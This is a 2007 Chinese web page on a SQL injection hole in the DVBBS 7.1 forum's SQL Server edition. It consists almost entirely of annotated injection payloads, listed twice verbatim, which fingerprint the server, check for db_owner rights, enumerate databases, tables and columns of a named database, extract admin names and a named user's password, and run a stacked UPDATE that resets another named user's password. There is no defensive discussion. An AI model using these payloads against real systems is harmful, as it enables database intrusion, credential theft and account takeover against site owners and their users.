DVBBS7.1 SQL版 跨库漏洞
更新时间:2007年01月16日 00:00:00 作者:
漏洞测试环境:DVBBS7.1 SQL
(select @@version)>0 获得Windows的版本号
and user_name()='dbo' 判断当前系统的连接用户是不是sa
(select user_name())>0 爆当前系统的连接用户
(select db_name())>0 得到当前连接的数据库
(select IS_MEMBER('db_owner')) --查询数据库当前用户权限
(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名
(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码
;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--
(select @@version)>0 获得Windows的版本号
and user_name()='dbo' 判断当前系统的连接用户是不是sa
(select user_name())>0 爆当前系统的连接用户
(select db_name())>0 得到当前连接的数据库
(select IS_MEMBER('db_owner')) --查询数据库当前用户权限
(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名
(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码
;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--